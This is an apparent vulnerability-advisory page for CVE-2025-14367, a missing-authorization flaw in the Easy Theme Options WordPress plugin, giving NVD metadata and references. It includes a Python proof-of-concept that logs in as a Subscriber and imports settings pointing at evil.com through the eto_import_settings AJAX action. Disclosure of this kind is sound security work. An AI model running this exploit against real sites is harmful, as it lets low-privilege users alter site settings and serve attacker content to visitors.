Security Vulnerability Report
CVE-2025-14367 CVSS 5.3 MEDIUM

CVE-2025-14367

Published: 2025-12-13 16:16:49
Last Modified: 2026-04-15 00:35:42

Description

The Easy Theme Options plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0. This is due to missing authorization checks in the eto_import_settings function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import arbitrary plugin settings via the 'eto_import_settings' parameter.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector (note: PR:N in this vector is inconsistent with the description, which requires an authenticated Subscriber-level account; scored with PR:L the same vector yields 4.3 MEDIUM rather than 5.3)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available (the NVD record's vulnStatus is "Deferred", so the affected-product range below is taken from the advisory text rather than from NVD configurations).

Easy Theme Options plugin for WordPress <= 1.0 (all versions up to and including 1.0; no fixed version is listed in this record)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14367 PoC - Easy Theme Options Missing Authorization # This PoC demonstrates how an authenticated user with Subscriber role can exploit # the missing authorization check in eto_import_settings function import requests import json target_url = "http://target-wordpress-site.com" username = "attacker" password = "password123" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Craft malicious settings payload # Attacker can import arbitrary plugin settings malicious_settings = { "eto_options": { "theme_color": "#malicious", "custom_css": "body {background: url('http://evil.com/malicious.js')}", "logo_url": "http://evil.com/fake-logo.png" } } # Step 3: Exploit via AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "eto_import_settings", "eto_import_settings": json.dumps(malicious_settings), "security": "any_value_accepted" } response = session.post(ajax_url, data=exploit_data) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") # Step 4: Verify settings were imported verify_url = f"{target_url}/wp-admin/admin.php?page=easy-theme-options" verify_response = session.get(verify_url) if "malicious" in verify_response.text: print("[+] Exploitation successful! Settings have been modified.") else: print("[-] Exploitation may have failed.")

References (from the NVD record below; use the plugin source links to confirm the PoC's assumptions about the AJAX action, nonce handling and settings schema)

- https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L277 (plugin source 1.0, line cited by NVD)
- https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L282 (plugin source 1.0, line cited by NVD)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8405e80d-fd72-4d87-b08a-19a686eb2982?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14367", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Theme Options plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0. This is due to missing authorization checks in the eto_import_settings function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import arbitrary plugin settings via the 'eto_import_settings' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L277", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L282", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8405e80d-fd72-4d87-b08a-19a686eb2982?source=cve", "source": "[email protected]"}]}}